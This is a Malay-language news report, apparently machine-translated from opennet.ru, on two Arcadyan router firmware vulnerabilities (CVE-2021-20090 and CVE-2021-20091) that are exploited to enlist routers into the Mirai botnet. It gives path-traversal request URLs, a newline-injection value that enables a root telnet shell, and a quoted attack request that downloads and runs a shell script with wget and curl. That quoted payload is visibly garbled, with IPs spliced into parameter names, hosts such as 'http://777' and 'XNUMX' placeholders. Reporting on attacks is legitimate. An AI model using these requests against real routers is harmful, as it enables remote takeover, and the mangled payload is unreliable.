Kerentanan dalam penghala rumah yang menjejaskan 17 pengeluar

Serangan besar-besaran telah direkodkan pada rangkaian terhadap penghala rumah yang perisian tegarnya menggunakan pelaksanaan pelayan HTTP daripada syarikat Arcadyan. Untuk mendapatkan kawalan ke atas peranti, gabungan dua kelemahan digunakan yang membolehkan pelaksanaan jauh kod arbitrari dengan hak akar. Masalahnya menjejaskan rangkaian penghala ADSL yang agak luas dari Arcadyan, ASUS dan Buffalo, serta peranti yang dibekalkan di bawah jenama Beeline (masalah itu disahkan dalam Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone dan pengendali telekomunikasi lain. Adalah diperhatikan bahawa masalah itu telah wujud dalam perisian tegar Arcadyan selama lebih daripada 10 tahun dan pada masa ini telah berjaya berhijrah kepada sekurang-kurangnya 20 model peranti daripada 17 pengeluar yang berbeza.

Kerentanan pertama, CVE-2021-20090, memungkinkan untuk mengakses mana-mana skrip antara muka web tanpa pengesahan. Intipati kelemahan ialah dalam antara muka web, beberapa direktori yang melaluinya imej, fail CSS dan skrip JavaScript dihantar boleh diakses tanpa pengesahan. Dalam kes ini, direktori yang akses tanpa pengesahan dibenarkan disemak menggunakan topeng awal. Menentukan aksara β€œ../” dalam laluan untuk pergi ke direktori induk disekat oleh perisian tegar, tetapi menggunakan gabungan β€œ..%2f” dilangkau. Oleh itu, adalah mungkin untuk membuka halaman yang dilindungi apabila menghantar permintaan seperti "http://192.168.1.1/images/..%2findex.htm".

Kerentanan kedua, CVE-2021-20091, membolehkan pengguna yang disahkan membuat perubahan pada tetapan sistem peranti dengan menghantar parameter yang diformat khas ke skrip apply_abstract.cgi, yang tidak menyemak kehadiran aksara baris baharu dalam parameter . Sebagai contoh, apabila melakukan operasi ping, penyerang boleh menentukan nilai "192.168.1.2%0AARC_SYS_TelnetdEnable=1" dalam medan dengan alamat IP sedang diperiksa dan skrip, apabila mencipta fail tetapan /tmp/etc/config/ .glbcfg, akan menulis baris β€œAARC_SYS_TelnetdEnable=1” ke dalamnya ", yang mengaktifkan pelayan telnetd, yang menyediakan akses shell perintah tanpa had dengan hak akar. Begitu juga, dengan menetapkan parameter AARC_SYS, anda boleh melaksanakan sebarang kod pada sistem. Kerentanan pertama memungkinkan untuk menjalankan skrip bermasalah tanpa pengesahan dengan mengaksesnya sebagai "/images/..%2fapply_abstract.cgi".

Untuk mengeksploitasi kelemahan, penyerang mesti boleh menghantar permintaan ke port rangkaian di mana antara muka web dijalankan. Berdasarkan dinamik penyebaran serangan, banyak pengendali meninggalkan akses pada peranti mereka daripada rangkaian luaran untuk memudahkan diagnosis masalah oleh perkhidmatan sokongan. Jika akses kepada antara muka hanya terhad kepada rangkaian dalaman, serangan boleh dilakukan daripada rangkaian luaran menggunakan teknik "pengikat semula DNS". Kerentanan sedang digunakan secara aktif untuk menyambungkan penghala ke botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Sambungan: tutup Agen Pengguna: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Sumber: opennet.ru

Tambah komen